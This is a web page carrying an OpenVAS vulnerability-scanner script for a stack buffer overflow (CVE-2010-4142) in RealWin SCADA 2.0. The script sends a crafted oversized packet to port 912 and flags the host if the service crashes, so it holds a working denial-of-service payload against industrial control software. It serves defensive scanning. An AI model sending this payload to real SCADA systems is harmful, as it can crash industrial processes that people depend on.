Lucene search

K
openvasCopyright (C) 2010 Greenbone Networks GmbHOPENVAS:801622
HistoryNov 02, 2010 - 12:00 a.m.

RealWin SCADA System Buffer Overflow Vulnerabilities

2010-11-0200:00:00
Copyright (C) 2010 Greenbone Networks GmbH
plugins.openvas.org
5

0.587 Medium

EPSS

Percentile

97.8%

This host is running RealWin SCADA system and is prone to buffer
overflow vulnerabilities.

###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_realwin_scada_bof_vuln.nasl 5373 2017-02-20 16:27:48Z teissa $
#
# RealWin SCADA System Buffer Overflow Vulnerabilities
#
# Authors:
# Sooraj KS <[email protected]>
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_impact = "Successful exploitation may allow remote attackers to execute
arbitrary code on the system or cause a denial of service condition.

Impact Level: Application";

tag_affected = "RealWin SCADA System 2.0 Build 6.1.8.10 and prior.";

tag_insight = "The flaws are due to a boundary errors when processing
'SCPC_INITIALIZE', 'SCPC_INITIALIZE_RF' and 'SCPC_TXTEVENT' packets that can
be exploited to cause a stack-based buffer overflow by sending specially
crafted packets to port 912/TCP.";

tag_solution = "Upgrade to RealWin SCADA System version 2.1 Build 6.1.10.10";

tag_summary = "This host is running RealWin SCADA system and is prone to buffer
overflow vulnerabilities.";

if(description)
{
  script_id(801622);
  script_version("$Revision: 5373 $");
  script_tag(name:"last_modification", value:"$Date: 2017-02-20 17:27:48 +0100 (Mon, 20 Feb 2017) $");
  script_tag(name:"creation_date", value:"2010-11-02 18:01:36 +0100 (Tue, 02 Nov 2010)");
  script_bugtraq_id(44150);
  script_cve_id("CVE-2010-4142");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_name("RealWin SCADA System Buffer Overflow Vulnerabilities");
  script_xref(name : "URL" , value : "http://secunia.com/advisories/41849");
  script_xref(name : "URL" , value : "http://www.exploit-db.com/exploits/15259/");
  script_xref(name : "URL" , value : "http://downloads.securityfocus.com/vulnerabilities/exploits/44150-1.rb");

  script_tag(name:"qod_type", value:"remote_vul");
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
  script_family("Buffer overflow");
  script_dependencies("find_service.nasl");
  script_require_ports(912);
  script_tag(name : "impact" , value : tag_impact);
  script_tag(name : "affected" , value : tag_affected);
  script_tag(name : "insight" , value : tag_insight);
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "summary" , value : tag_summary);
  exit(0);
}

## Default Realwin Port
port = 912;
if(!get_port_state(port)){
  exit(0);
}

head = raw_string(0x64, 0x12, 0x54, 0x6A, 0x20, 0x00, 0x00, 0x00,
                   0xF4, 0x1F, 0x00, 0x00);

junk = crap(data:"a", length: 8190);
junk += raw_string(0x00);

## Open TCP Socket
soc = open_sock_tcp(port);
if(!soc) exit(0);

## Sending payload
send(socket:soc, data: head + junk);
close(soc);

sleep(5);

## Check Port status
soc = open_sock_tcp(port);
if(!soc){
 security_message(port);
}

0.587 Medium

EPSS

Percentile

97.8%